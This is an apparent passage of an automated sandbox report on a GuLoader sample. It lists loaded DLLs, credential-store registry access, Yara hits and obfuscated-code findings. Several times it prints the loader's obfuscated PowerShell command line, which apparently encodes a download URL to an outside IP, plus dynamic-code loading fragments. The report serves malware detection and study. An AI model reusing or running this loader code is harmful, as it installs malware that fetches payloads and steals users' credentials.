                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatal", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Huldrekvinde $Kaosets189 $headwards), (Savendes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:kloreres = [AppDomain]::CurrentDomain.GetAssemblies()$globa
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Supraconduction)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Undladelsers, $false).DefineType($Kegleha
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
                Obfuscated command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget 